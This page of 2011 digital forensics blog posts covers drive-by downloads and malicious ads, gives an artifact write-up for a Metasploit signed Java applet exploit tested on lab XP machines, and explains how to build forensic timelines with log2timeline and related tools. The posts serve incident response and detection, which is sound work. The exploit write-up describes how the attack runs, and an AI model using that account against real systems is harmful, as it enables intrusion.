Overall I give Perl Programming for the Absolute Beginner a four star review (based on Amazon’s rating scheme). I highly recommend the book for anyone looking to learn the Perl programming language in addition to basic programming concepts. The book teaches the basics in an entertaining way enabling anyone to write simple scripts to solve issues. For those with programming backgrounds then I suggest looking elsewhere for a book on Perl since this is too basic. Learning Perl is a decent candidate because the target audience is for people familiar with programming concepts (I moved on to this book after reading Perl Programming for the Absolute Beginner).
Labels: ,

Linkz about Attacks

Sunday, October 16, 2011 Posted by Corey Harrell 0 comments
In this round of links I’m talking about drive-bys, malicious ads, web attack artifacts revealed with Mandiant’s Highlighter, and a justification for companies to fail security audits.

Video Showing Drive-by Download from MySQL

As most people probably heard by now MySQL.com was serving up malware to its visitors last month. SecurityMonkey put together the post [Video]: Watch Malware Drive-By Download from MySQL.com which contained various links about the incident. One link was to a video created by Armorize that captured what happened to anyone who visited the website when the issue was occurring. The video is about five minutes long and I highly recommend for people to check it out. I’ve never seen a drive-by broken down before by video. The video by itself is pretty cool but I think the true value is in what it shows about the attack vector infecting people visiting the website. Check out the sequence of events I noted from the video:

        -  (00:55) Internet Explorer starts to load the website mysql.com
        -  (01:04) Java.exe starts running on the computer
        -  (01:11) Executables are dropped onto the computer. These were the attack’s payload
        -  (03:43) It was revealed that a Jar file was downloaded to the system and this is why Java started. The Jar file download occurred before the executables appeared on the computer

The attack summary was a user visited mysql.com and eventually gets redirected to a site hosting the Black Hole exploit pack. In that instance, the exploit pack used a Java vulnerability to infect the system. Why does any of this even matter … knowing this can help determine how a system was compromised. Let’s say someone was dealing with an infected computer and were trying to figure out how the malware got installed on the computer. The video didn’t show what was on the system’s hard drive but the attack is very similar to the Java exploit artifacts I documented. To date I’ve documented three different ones which were Java Signed Applet Exploit Artifacts, CVE-2010-0840 (Trusted Methods) Exploit Artifacts, and CVE-2010-0094 (RMIConnectionImpl) Exploit Artifacts. There was a consistent pattern to the all the artifacts:

        -  Temporary file created (Jar file got dropped onto the system)
        -  Indications of a vulnerable Java executing
        -  Internet activity showed a user visited a malicious website

The key difference (besides the Java vulnerability) between the Armorize video and the method I used to document the exploit artifacts was the tool used to create and deliver the exploit. The video documented a Java exploit from the Blackhole exploit pack and according to Contagio’s August 2011 Exploit Pack Overview spreadsheet Blackhole goes for $1,500 a year. My testing leveraged the freely available Metasploit to document exploit artifacts. Taking the time to document the exploit artifacts can pay big dividends during an examination when trying to determine the “how”. How did the system get infected? Well if the activity on the system around the time malware was created shows either a Jar file appearing or Java executing then a Java vulnerability may have been the culprit. If there is Internet activity then the Internet and a web browser may have been used to deliver the exploit to the system.

Malicious Advertisement Leads to PDF Exploit

I first started looking into attack vector artifacts when one of my systems got whacked with a Fake AV virus. At the time I had the DF skills but I lacked the IR skills such as figuring out what happened to my system. I took a shot at trying to figure out how the system became infected to see if I could. It took me a little bit but I was not only able to find the malware dropped onto my system but I traced the infection back to Yahoo email. I was even able to determine the exploit used in the drive-by. It was a malicious PDF file that targeted a vulnerability in Adobe Reader. The PDF appeared on the system in the temporary Internet files folder just prior to the first malware getting dropped. The experience taught me valuable lessons. First the more obvious one; don’t quickly check your web email from a test system with vulnerable apps even if it’s only for a few seconds. The second and more important lesson was the need to understand how different attacks appear on a system after they have occurred. The examination took me some time to figure out since I didn’t really know what to expect or what artifacts to look for.

I recently came across TrendMicro’s post Malicious Ads Lead to PDF Exploits. The post is from last year but it made me reflect on the experience that motivated me to start my journey into incident response. The post mentioned how malvertisements on a popular web-based email service lead to users being directed to sites with exploits. The article isn’t written from the DFIR perspective since it was focused on the vulnerabilities targeted in the attack. There wasn’t much discussion about the artifacts left on a system either besides malicious PDFs and internet activity. The little information provided did show how the attack occurred.

        -  User visits web based email service
        -  Redirect downloads malicious PDFs targeting Adobe Reader vulnerabilities
        -  Adobe reader has to process the PDF for the exploit to be successful and install malware

The attack pattern is something I’ve seen in a few other places. My infected test system had the same sequence of events but it took me a bit to actually see it. That examination made me more aware about the artifacts associated with a PDF exploit thereby making it easier to spot it in a few other examinations I did afterwards. I also saw the same pattern on my test systems I exploited with Metasploit. I researched a PDF exploit in the post CVE-2010-2883 (PDF Cooltype) Exploit Artifacts. Do the following areas I noted in the post look familiar?

        -  PDF document created
        -  There were references about a PDF file being accessed
        -  A vulnerable Adobe Reader started on the system

Web Attack Artifacts

Russ McRee’s October’s Toolsmith Log Analysis with Highlighter is a great read for a couple reasons. I enjoy reading his articles since he provides an overview about a tool’s functionality. In this edition he doesn’t disappoint as he covers how to perform log analysis with Mandiant’s Highlighter. Showing how to do log analysis is cool enough but he demonstrates the tool by looking for attacks in his website’s logs. He looks for specific artifacts caused by remote file include and directory traversal attacks. I haven’t found any references that document the artifacts left in logs by different attacks so I enjoyed reading about it. Eventually I’m going to start researching the artifacts left in logs but I still have a lot to do with the artifacts left on systems.

Fail a Security Audit Already Will You

When I started working full time in the information security field I was performing vulnerability assessments and security audits. Maybe I’m a little biased because of my background but I can see the value security audits provide when performed correctly. I’m not talking about audits where boxes are just checked off but risk based audits looking at the security controls protecting an organization’s critical information. Andreas M. Antonopoulos's article Fail a security audit already -- it's good for you provides an argument for why companies should fail security audits. The article makes some great points but the one thing I thought was missing is when organizations try to justify (aka make excuses) or minimize why serious weaknesses are present. Take patching as an example.

Patching isn’t done to prevent applications and systems from breaking. I was a system admin so I get it … especially since I’ve dealt with the hassle of tracking down the patches that jacked up my systems. However, using the reason as a justification to not patch without doing any due diligence by you know actually testing patches to see if anything breaks is something else. The SANs Top Cyber Security Risks report from a few years ago highlighted how third party applications on client systems are targeted. The exploits I discussed in this linkz edition targeted vulnerabilities in client applications such as Java and Adobe. How can these vulnerabilities on computers with users surfing the web be lumped into the same category as some application supporting a critical business process with neither of them getting patched? The security risk didn’t go away and the vulnerabilities don’t magically repair themselves. It’s too late to finally figure it out once the organization is staring at the artifacts from a successful exploit.

Java Signed Applet Exploit Artifacts

Thursday, October 13, 2011 Posted by Corey Harrell 0 comments
Artifact Name

Java Signed Applet Exploit Artifacts

Attack Vector Category

Exploit

Description

A signed Java applet is presented to a user and a dialog box asks the user if they trust it. If the user is socially engineered to run the applet then arbitrary code executes under the context of the currently logged on user.

Attack Description

This description was obtained using the Metasploit exploit reference. A user visits a web page hosting the signed Java applet and a Java window pops up asking the user to run the applet. Once the user runs it then a program is downloaded and executed on the system.

Exploits Tested

Metasploit v4.0 multi\browser\java_signed_applet

Target System Information

* Windows XP SP3 Virtual Machine with Java 6 update 16 using administrative user account

* Windows XP SP3 Virtual Machine with Java 6 update 16 using non-administrative user account

Different Artifacts based on Administrator Rights

No

Different Artifacts based on Software Versions

Not tested

Potential Artifacts

The potential artifacts include a Jar file and the changes the exploit causes in the operating system environment. The artifacts can be grouped under the following three areas:

        * Temporary File Creation
        * Indications of the Vulnerable Application Executing
        * Internet Activity

Note: the documenting of the potential artifacts attempted to identify the overall artifacts associated with the vulnerability being exploited as opposed to the specific artifacts unique to the Metasploit. As a result, the actual artifact storage locations and filenames are inside of brackets in order to distinguish what may be unique to the testing environment.

        * Temporary File Creation

            -JAR file created in a temporary storage location on the system within the timeframe of interest. [C:/Documents and Settings/Administrator/Local Settings/Temp/jar_cache5490377340104033776.tmp. The contents of the JAR file contained a manifest file, a class file, and an executable.


       * Indications of the Vulnerable Application Executing

           - Log files indicating Java was executed within the timeframe of interest. [C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/deployment.properties, C:/Documents and Settings/Administrator/Local Settings/Temp/java_install_reg.log, and C:/Documents and Settings/Administrator/Local Settings/Temp/jusched.log] The picture below shows the contents of the deployment.properties log.


            - Prefetch files of Java executing. [C:/WINDOWS/Prefetch/JAVA.EXE-0C263507.pf]

            - Registry modification involving Java executing at the same time as reflected in the jusched.log file. [HCU-Admin/Software/JavaSoft/JavaUpdate/Policy/JavaFX]

            - Folder activity involving the Java application. [C:/Program Files/Java, C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/, and C:/Documents and Settings/Administrator/Local Settings/Temp/hsperfdata_username]

        * Internet Activity

            - Web browser history of user accessing websites within the timeframe of interest. [Administrator user account accessed the computer -192.168.11.200- running Metasploit]

            - Files located in the Temporary Internet Files folder. [C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/]

           - Registry activity involving Internet Explorer

Timeline View of Potential Artifacts

The images below shows the above artifacts in a timeline of the file system from the Windows XP SP3 system with an administrative user account. The timeline includes the file system, registry, prefetch, event logs, and Internet Explorer history entries.






References

Exploit Information


Metasploit Exploit Information http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

Building Timelines – Tools Usage

Sunday, September 25, 2011 Posted by Corey Harrell 3 comments
Tools are defined as anything that can be used to accomplish a task or purpose. For a tool to be effective some thought has to go into how to use it. I have a few saws in my garage but before I try to cut anything with them I first come up with a plan on what I’m trying to accomplish. Timeline tools are no different and their usage shouldn’t solely consist of running commands. The post Building Timelines – Thought Process Behind It discusses an approach to develop a plan on the way timeline tools will be used. This post is the second part where the tools to build timelines is discussed.

There is not a single tool for building timelines since tools vary based on the DFIR practitioner’s needs and preferences. When I first started learning about timeline analysis I read as much as I could about the technique and downloaded various tools to test their capabilities to see what worked best for me. I’m discussing my current method and a few tools that I build timelines with. The method is different from what I was doing last month and will probably change down the road as tools are updated, new tools are released, and my needs/preferences vary.

I’m trying to show different ways timelines can be built in addition to building my own timeline for an infected Windows XP SP3 test system. The artifacts selected for my timeline are:  event logs, Internet Explorer history, XP firewall logs, prefetch files, Windows restore points, select registry keys, entire registry hives, and the file system metadata. The user specific artifacts (ie history and registry keys from the NTUSER.DAT hive) only need to be parsed for the administrator user account. The extraction of the timestamps from those artifacts will be accomplished in the following activities:

        -  Artifact Timestamps
        -  File System Timestamps
        -  Registry Timestamps

Tools’ Output

Before a timeline can be created one must first choose what format to use for the tools’ output. Selecting the format up front ensures multiple tools’ outputs can go into the same timeline. Three common output types are: bodyfile, TLN, and comma-separated value (csv). The bodyfile format shows file activity and separates the output into different sections. The version in use will determine what the sections are but the Sleuthkit Wiki bodyfile page explains the differences and provides an example. The TLN format breaks the data up into five sections: time, source, host, user, and description. Harlan provided a great description about his format in the post Timeline Analysis...do we need a standard? and in Appendum for the post TimeLine Analysis, pt III. The csv format stores data so it is separated by rows and columns. This format works well for viewing the timeline data in spreadsheets. However, unlike the bodyfile and TLN formats csv is not a standard format. The csv schema from tools may differ resulting in the need for additional processing for the outputs to go into the same timeline. Kristinn’s post Timeline Analysis 201 – review the timeline explains the csv schema used in his Log2timeline tool.

I mostly review timelines with spreadsheet programs so I opted for Log2timeline’s csv format. I use Log2timeline to convert other tools’ outputs into proper csv schema. My timeline in this post uses the csv format and I demonstrate how to convert between different formats.

Artifact Timestamps

I couldn’t come up with a good name when I was thinking about how to explain the different activities I do when creating timelines. What I mean when I say artifact timestamps is everything expect for the last write times from dumped registry hives and timestamps from the file system. The different tools to extract timestamps from artifacts include Harlan’s timeline tools and Log2timeline. Harlan accompanies his tools posted on the Win4n6 yahoo group with a great step by step guide about building timelines with his tools. I cover how to use Log2timeline and the following is a brief explanation about the tool’s syntax:

log2timeline.pl -z timezone -f plugin/plugin_ file -r -w output-file-name log_file/log_dir

        -z defines the timezone for the computer where the artifacts came from
        -f specifies the plugin or pluging file to run against the file/directory
        -w specifies the file to write the output to
        -r makes log2timeline work in recursive mode so the folder specified and its subfolders are all examined for artifacts

Options to Extract Timestamps with Single Plugin or Default Plugin File

Log2timeline is plugin based and the tool can execute a single plugin against a single file/directory or execute a plugin file against multiple files in directories. I prefer to use custom plugins for my timelines but first I wanted to show the single plugin and default plugin file methods. The command below will execute the evt plugin to parse the Security windows event log and the output will be written to a file named fake-timeline.csv.

log2timeline.pl -z local -f evt -w fake-timeline.csv F:\WINDOWS\system32\config\SecEvent.Evt

The single plugin method requires multiple commands to extract timestamps from different artifacts in a system. Plugin files address the multiple command issue since the file contains a list of plugins to run. Log2timeline comes with a few default plugin files and the best one that fits my selected artifacts is the winxp plugin file. The command below runs the winxp plugin file against the entire mounted forensic image (the red text highlights what is different from the previous command).

log2timeline.pl -z local -f winxp -w fake-timeline.csv –r F:\

The winxp plugin file makes things a lot easier since only one command has to be typed. However, the file parses a lot more data then I actually need. The plugins executed are: chrome, evt, exif, ff_bookmark, firefox3, iehistory, iis, mcafee, opera, oxml, pdf, prefetch, recycler, restore, setupapi, sol, win_link, xpfirewall, wmiprov, ntuser, software, and system. I only wanted to parse IE history but winxp is doing every browser supported by log2timeline. I only wanted to parse artifacts in the administrator’s user profile but the above command is parsing artifacts from every profile on the system. I wanted to limit my timeline to specific artifacts but winxp is giving me everything. Not exactly what I’m looking for.

Single plugins and default plugin files are viable methods for building timelines. However, neither let’s me easily build a timeline containing only my selected artifacts that were tailored to the case and system I’m processing. This is where custom plugin files come into play and why I use them instead.

Extracting Timestamps for my Timeline with Custom Plugin Files

Kristinn deserves all the credit for why I know about the ability to create custom plugin files. I’m just the guy who asked him the question and decided to blog the answer he gave me. A custom plugin file is a text file that lists one plugin per line and is saved with the .lst file extension. The picture is a custom file named test.lst and it contains plugins for prefetch files, event logs, and system restore points.

Custom Plugin File Example

The custom file is placed in the same directory where the default plugin files are located. On a Windows system with Log2timeline 0.60 installed the directory is C:\Perl\lib\Log2t\input\.

I only want to parse artifacts in the administrator user profile instead of all user profiles stored on the system. At the time I wrote this post, Log2timeline doesn’t have the ability to exclude full paths (such as unwanted user profiles) when running in recursive mode. As a result I create two custom plugin files; one file parses the artifacts in a user profile while the other parses the remaining artifacts throughout the system. This lets me control what user profiles to extract timestamps from since I can run the user plugin file against the exact ones I need.

The user custom plugin file is named custom_user.lst and contains the iehistory and ntuser plugins. The other custom plugin file is named custom_system.lst and contains the evt, xpfirewall, prefetch, and restore plugins. The two commands below execute the custom_user.lst against the administrator’s user account profile and custom_system.lst against the entire drive while saving the output to the file timeline.csv.

log2timeline.pl -z local -f custom_user -w C:\win-xp\timeline.csv –r “F:\Documents and Settings\Administrator”

log2timeline.pl -z local -f custom_system -w C:\win-xp\timeline.csv –r F:\

The commands extracted the timestamps from all of the artifacts on my list except for the entire registry hives last write times and file system timestamps. The picture shows the timeline built so far. The timeline is sorted and the section shown is where the prefetch file I referenced in the post What’s a Timeline is located.

Timeline Data Added by Custom Plugin File

Filesystem Timestamps

The filesystem timestamps is concerned about adding the activity involving files and directories to the timeline. There are different tools that extract the information including FTK Imager, AnalyzeMFT, Log2timeline, and the Sleuthkit. I’m demonstrating two different methods to add the data to my timeline to show the differences between the two. The tools for the first method include the Sleuthkit and Log2timeline while the second method only uses Log2timeline.

The fls.exe program in the Sleuthkit will list the files and directories in an image. The command below creates a bodyfile containing the files/directories’ activity in the test forensic image and stores the output in the file named fls-bodyfile.txt. (the –m switch makes the output format mactime, -r is for recursive mode, and –o is the sector offset where the filesystem starts)

fls.exe -m C: -r -o 63 C:\images\image.dd >> C:\win-xp\fls-bodyfile.txt

Fls.exe’s output is in the bodyfile format but my timeline is in Log2timeline’s csv format. Log2timeline has plugins to parse output files in the TLN and bodyfile formats. This means the tool can be used to convert one format into another. The command below parses the fls-bodyfile.txt file and adds the data to my timeline.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\ fls-bodyfile.txt

The picture highlights the new entries to the section of my timeline. Doesn’t the story about what occurred become clearer?

Timeline Data Added by fls.exe

The file system in the Windows XP test system is NTFS. NTFS stores two sets of timestamps which are the $FILE_NAME attribute and $STANDARD_INFORMATION timestamps. Fls.exe along with the majority of the other forensic tools shows the $STANDARD_INFORMATION timestamps. However, there may be times when it’s important two include both sets of timestamps in a timeline. One such occurrence is when there’s a concern that timestamps might have been altered. Parsing the Master File Table ($MFT) can add both sets of timestamps to a timeline. The command below shows Log2timeline parsing the $MFT and adding the output to the file timeline-copy.csv.

log2timeline.pl -z local -f mft -w timeline.csv F:\$MFT

The picture below highlights the new entries for the data extracted from the $MFT. Notice the difference between the timeline only containing the $STANDARD_INFORMATION timestamps compared to containing both timestamps. Quick side note: the mft plugin could be added to a custom plugin file.

Timeline Data Added by $MFT

Registry Timestamps

In the artifact timestamps section Log2timeline extracted data from select registry keys. However, there are times when I want all registry keys’ last write times from registry hives. So far I want this ability when dealing with malware infections since it helps identify the persistence mechanism and registry modifications. The tools to extract the last write times from registry hives include Harlan’s regtime.pl script (I obtained it from the Sift 2.0 workstation) and Log2timeline. For my timeline I’m interested in the System, Software, and administrator’s NTUSER.DAT registry hives. The commands below has regtime.pl extracting the last write times from each hive and storing it in the bodyfile file named reg-bodyfil.txt (the –m switch prepends the text to each line and the –r switch is the path to the registry hive).

regtime.pl –m HKLM/system –r F:\Windows\System32\config\system >> C:\win-xp\reg-bodyfile.txt

regtime.pl –m HKLM/software –r F:\Windows\System32\config\software >> C:\winxp\reg-bodyfile.txt

regtime.pl –m HKCU/Administrator –r "F:\Documents and Settings\Administrator\NTUSER.DAT" >> C:\win-xp\reg-bodyfile.txt

Regtime.pl’s output is in the bodyfile format so Log2timeline makes the format conversion as shown in the command below.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\reg-bodyfile.txt

The picture highlights the new data added to the timeline with the Sleuthkit. The timeline now highlights the malware’s persistence mechanisms (run and services registry keys)

Timeline Data with Registry Keys' Last Write Times

Sorting the Timeline

When new data is added to a timeline it’s placed at the end of the file which means the timeline needs to be sorted prior to viewing it. There are different sorting options such as the mactime.exe program in the Sleuthkit to bodyfile format timelines. A quick method I use is my spreadsheet program’s sort feature. The settings below will make Excel sort from the oldest time to the most recent.

Excel 2007 Sort Feature

Summary

The approach described in my Building Timeline series is just one way out of many to create timelines. The DFIR community has provided a wealth of information on the topic. Look at the following examples which are only a drop in the bucket of knowledge. Harlan Carvey created and released tools for creating timelines in addition to regularly posting on his blog (a few posts are HowTo: Creating Mini-Timelines and A Bit More About Timelines...). Kristinn Gudjonsson is very similar in that he created and released log2timeline in addition to providing information on his websites (a few posts are Timeline Analysis 101 and Timeline Analysis 201 – review the timeline). Rob Lee has shared his approach in the way he builds timelines and two of his posts are SUPER Timeline Analysis and Creation and Shadow Timelines And Other VolumeShadowCopy Digital Forensics Techniques with the Sleuthkit. Chris Pogue has shared his method to create timelines on his blog and a few posts are Log2Timeline and Super Timelines and Time Stomping is for Suckers. The last author I’ll directly mention is Don Weber who released his scripts for creating timelines and blogged about creating timelines (one post is Hydraq Details Revealed Via Timeline Analysis). These are only a few tools, blog posts, and authors who have taken the time to share their thoughts on timeline analysis. To see more try the keyword “timeline” in the Digital Forensic Search to see what’s out there.

For anyone looking to become more proficient at the timeline analysis then I recommend to do what I did. Read everything you can find on the topic, download and test the different tools people talk about, and try out different approaches to see how the resulting timelines differ. It won’t only teach you about timeline analysis but will help identify what method and tools work best for you.